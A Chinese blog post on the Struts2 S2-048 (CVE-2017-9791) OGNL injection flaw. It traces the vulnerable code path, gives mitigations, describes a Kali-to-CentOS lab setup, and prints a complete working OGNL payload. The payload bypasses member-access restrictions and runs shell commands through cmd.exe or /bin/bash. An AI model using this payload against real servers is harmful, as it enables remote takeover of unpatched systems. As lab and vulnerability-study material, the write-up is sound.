Struts2_048(CVE-2017-9791)远程代码执行漏洞EXP

一、漏洞分析

1.漏洞背景:

1)官方说明:

It is possible to perform a RCE attack with amalicious field value when using the Struts 2 Struts 1 plugin and it's a Struts1 action and the value is a part of a message presented to the user, i.e. whenusing untrusted input as a part of the error message in the ActionMessageclass.

2)详见:https://cwiki.apache.org/confluence/display/WW/S2-048,这个漏洞本质上是在struts2-struts1-plugin这个jar包上。这个库是将struts1的action封装成struts2的action以便在strut2上使用。

3)主要受影响的Struts版本为:2.3.x

4)攻击者构造恶意字段值(value)通过Struts2的struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。

2.漏洞原因

1)showcase/src/main/java/org/apache/struts2/showcase/integration/SaveGangsterAction.java下,“Struts1.gangsterAdded”被引入:

2)showcase/src/main/resources/globalMessages.properties下“Struts1.gangsterAdded”被定义:

Struts1.gangsterAdded是一个关键值,一旦“Gangster{0} added successfully”,它将绕开执行OGNL代码。

3)这个漏洞本质上是在struts2-struts1-plugin这个jar包上。这个库是将struts1的action封装成struts2的action以便在strut2上使用。本质问题出在struts2-struts1-plugin包Struts1Action.java文件中,Struts1Action类中的execute方法调用了getText函数,这个函数会执行ognl表达式,更为严重的是getText的输入内容是攻击者可控的。

4)输入参数之后,执行Struts1ction的execute方法。

5)调用saveGangsterAction的excute方法,将表单中地内容封装到actionforward,这个方法中就带入有毒参数gforn.getName()放到了messages结构中,gform.getName()的值是从客户端获取的。

6)攻击者将用户可控地值添加到ActionMessage并在客户前端展示,导致其进入getText函数,最后messageb被当作ognl表达式执行。以下两部分代码事位于integration app下的SaveGangsterAction.java部分源码:

3.漏洞总结:

1)通过运行struts1Acion.java的execute方法,获取Action。

2)调用saveGangsterAction的execute方法,这部分代码就是漏洞代码,这里创建了一个action message变量,将表单请求封装到actionForm中。代码详见图2.6)

3)设置标识,获取ActionMessage。

4)回到Struts1Action.java,跟着代码流,我们能看到控制流到达getText方法在TextProviderSupport.java:

红框所示的是在LocalizeTextUtil.Java中FindText的方法。这种方法负责找到本地message给key,它也能解析OGNL表达式。这个key就是aTextName,正如漏洞原因中提到的。

5)如果这种方法在提供地key中没有找到message,它就会调用getDefaultMessage地方法:


6)translateVariables方法从OgnlTextPrasrt.java中调用parser.evaluate方法,Parser.evaluate函数事负责从message段中解析OGNL表达式的,它检查在message中的”${“或者”%{”字符串,创建var变量并且求它的值。这里就不截图了。

7)在Apache Struts中,大部分OGNL注入漏洞都被爆出来了。攻击者能够利用这些漏洞很容易就执行命令,因为OGNL注入漏洞比起其他攻击更简单。

8)漏洞防护:1)停用Struts2-struts1-plugin插件、showcase.war;2)讲直接传递原始值改为使用资源键:


二、宿主环境及攻击环境

这里,我开了两个虚拟机,kali做攻击机,Centos做靶机,以模拟RCE。

1.靶机:centOS 7.3:

2.攻击机:kali linux


三、EXP实现

1.搭建漏洞环境

1)下载漏洞环境包:http://archive.apache.org/dist/struts/2.3.24/struts-2.3.24-apps.zip

2)下载Tomcat:http://tomcat.apache.org/tomcat-7.0-doc/index.html

3)在Centos解压Tomcat包(这里我解压到用户目录下)

4)将下载好的漏洞环境包解压,将struts2-showcase.war,将移至解压后的Tomcat目录下的webapps下

5)开启Tomcat,执行命令:

2.本地验证漏洞

1)在终端打开Tomcat之后,在浏览器查看:127.0.0.1:8080,下图表示tomcat搭建成功:

2)访问漏洞环境:(如果无法访问,重启Tomcat将自动部署漏洞war包)

http://127.0.0.1:8080/struts2-showcase/integration/saveGangster.action

3)验证漏洞环境

    i.输入表达式

    ii.Submit之后可看到运算被后台执行:

3.模拟RCE(远程代码执行)(确保Tomcat打开)

1)Centos开启httpd、iptables、关闭防火墙、设置虚拟机NAT地址和端口。详见:http://blog.csdn.net/microsoft2014/article/details/57413491

http://linux.it.net.cn/CentOS/fast/2015/0110/11567.html

2)确认Centos的IP:

3)Kali访问Centos,执行OGNL语句:

4)访问:http://192.168.152.136:8080/struts2-showcase/integration/saveGangster.action

5)Submit后:


4.POC使用

1)声明文件上传:

%{(#szgx='multipart/form-data')

2)注入OGNL代码,通过ognl表达式静态调用获取ognl.OgnlContext的DEFAULT_MEMBER_ACCESS属性,并将获取地结果覆盖_memberAccess属性,绕过SecurityMemberAccess限制:

(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm))))

3)判断服务器系统,调用cmd或bash:

(#cmd='echo dota').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}

四、其他

1.复现过程中出现的问题及解决办法

1)Tomcat安装的时候,一开始安装我装的事7.0.8x版本,在浏览器上进不了tomcat,后来使用低版本的,成功解决这个问题。

2)关闭、重置Centos防火墙的时候在终端下输入命令可能会出现一些问题,这些问题一般是因为没有安装一些软件如:iptables、httpd等,解决方法已在上述说明。

3)模拟远端登录的时候,一定要注意攻击机输入地IP为Centos服务器地址+端口号。


推荐阅读更多精彩内容

  • Struts2框架 Struts由来 Struts最早是作为ApacheJakarta项目的组成部分,项目的创立者...
    whilewrongDebug阅读 1,230评论 0 0
  • 概述 什么是Struts2的框架Struts2是Struts1的下一代产品,是在 struts1和WebWork的...
    inke阅读 2,054评论 0 50
  • 时间都去哪了?不知不觉2017年就要过去四分之一,你还记得新年第一天自己写下的豪言壮语吗?还记得自己有多少需要完成...
    拉小姐阅读 255评论 0 0
  • 本书通过精美的图片和活泼的文字,描绘了动物眼睛的颜色、大小和所看到的景象等,向孩子们讲述了动物眼睛的作用和在动物的...
    潮尚宝贝儿阅读 2,130评论 0 0
  • 替一个朋友来教小孩子。在我看来,10岁真的不算小。这么形容比较符合他们的言行吧。 其中有几个眉眼如画的女孩,一路嘻...
    柒萬阅读 80评论 0 0